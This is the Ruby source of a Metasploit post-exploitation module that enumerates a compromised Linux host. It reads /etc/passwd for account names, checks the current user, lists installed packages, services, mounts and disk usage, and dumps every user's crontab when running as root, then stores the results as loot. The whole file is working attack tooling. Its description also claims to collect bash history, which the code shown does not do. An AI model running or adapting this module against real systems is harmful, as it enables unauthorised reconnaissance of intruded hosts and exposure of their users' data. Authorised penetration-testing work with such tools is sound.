## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Linux::System def initialize(info={}) super( update_info( info, 'Name' => 'Linux Gather System and User Information', 'Description' => %q{ This module gathers system information. We collect installed packages, installed services, mount information, user list, user bash history and cron jobs }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez ', # get_packages and get_services 'Stephen Haywood ', # get_cron and original enum_linux 'sinn3r', # Testing and modification of original enum_linux 'ohdae ', # Combined separate mods, modifications and testing ], 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell' ] )) end def run distro = get_sysinfo store_loot( "linux.version", "text/plain", session, "Distro: #{distro[:distro]},Version: #{distro[:version]}, Kernel: #{distro[:kernel]}", "linux_info.txt", "Linux Version") # Print the info print_good("Info:") print_good("\t#{distro[:version]}") print_good("\t#{distro[:kernel]}") users = execute("/bin/cat /etc/passwd | cut -d : -f 1") user = execute("/usr/bin/whoami") installed_pkg = get_packages(distro[:distro]) installed_svc = get_services(distro[:distro]) mount = execute("/bin/mount -l") crons = get_crons(users, user) diskspace = execute("/bin/df -ahT") disks = (mount +"\n\/"+ diskspace) save("Linux version", distro) save("User accounts", users) save("Installed Packages", installed_pkg) save("Running Services", installed_svc) save("Cron jobs", crons) save("Disk info", disks) end def save(msg, data, ctype="text/plain") ltype = "linux.enum.system" loot = store_loot(ltype, ctype, session, data, nil, msg) print_status("#{msg} stored in #{loot.to_s}") end def get_host case session.type when /meterpreter/ host = sysinfo["Computer"] when /shell/ host = session.shell_command_token("hostname").chomp end print_status("Running module against #{host}") return host end def execute(cmd) vprint_status("Execute: #{cmd}") output = cmd_exec(cmd) return output end def cat_file(filename) vprint_status("Download: #{filename}") output = read_file(filename) return output end def get_packages(distro) packages_installed = nil if distro =~ /fedora|redhat|suse|mandrake|oracle|amazon/ packages_installed = execute("rpm -qa") elsif distro =~ /slackware/ packages_installed = execute("ls /var/log/packages") elsif distro =~ /ubuntu|debian/ packages_installed = execute("dpkg -l") elsif distro =~ /gentoo/ packages_installed = execute("equery list") elsif distro =~ /arch/ packages_installed = execute("/usr/bin/pacman -Q") else print_error("Could not determine package manager to get list of installed packages") end return packages_installed end def get_services(distro) services_installed = "" if distro =~ /fedora|redhat|suse|mandrake|oracle|amazon/ services_installed = execute("/sbin/chkconfig --list") elsif distro =~ /slackware/ services_installed << "\nEnabled:\n*************************\n" services_installed << execute("ls -F /etc/rc.d | /bin/grep \'*$\'") services_installed << "\n\nDisabled:\n*************************\n" services_installed << execute("ls -F /etc/rc.d | /bin/grep \'[a-z0-9A-z]$\'") elsif distro =~ /ubuntu|debian/ services_installed = execute("/usr/bin/service --status-all") elsif distro =~ /gentoo/ services_installed = execute("/bin/rc-status --all") elsif distro =~ /arch/ services_installed = execute("/bin/egrep '^DAEMONS' /etc/rc.conf") else print_error("Could not determine the Linux Distribution to get list of configured services") end return services_installed end def get_crons(users, user) if user == "root" and users != nil users = users.chomp.split() users.each do |u| if u == "root" vprint_status("Enumerating as root") cron_data = "" users.each do |u| cron_data += "*****Listing cron jobs for #{u}*****\n" cron_data += execute("crontab -u #{u} -l") + "\n\n" end end end else vprint_status("Enumerating as #{user}") cron_data = "***** Listing cron jobs for #{user} *****\n\n" cron_data += execute("crontab -l") end # Save cron data to loot return cron_data end end